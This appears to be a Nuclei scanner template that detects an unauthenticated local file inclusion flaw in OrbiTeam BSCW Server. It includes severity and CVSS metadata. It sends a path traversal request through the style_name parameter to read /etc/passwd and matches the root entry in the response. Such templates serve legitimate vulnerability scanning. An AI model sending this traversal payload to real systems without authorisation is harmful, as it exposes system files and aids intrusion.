id: orbiteam-bscw-server-lfi

info:
  name: OrbiTeam BSCW Server - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    OrbiTeam BSCW Server versions 5.0.x, 5.1.x, 5.2.4 and below, 7.3.x and below, and 7.4.3 and below are vulnerable to unauthenticated local file inclusion.
  reference:
    - https://packetstormsecurity.com/files/165156/OrbiTeam-BSCW-Server-XSS-LFI-User-Enumeration.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: bscw,orbiteam,lfi,unauth,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 490a00463044022049a949a09aaccddb58136c0e6060a53334c58bd941b3e589d46d00fbe42a1018022009d3bb913558cb68f72d7548589d16127e648c422651484784b77ee9efddf8dc:922c64590222798bb761d5b6d8e72950
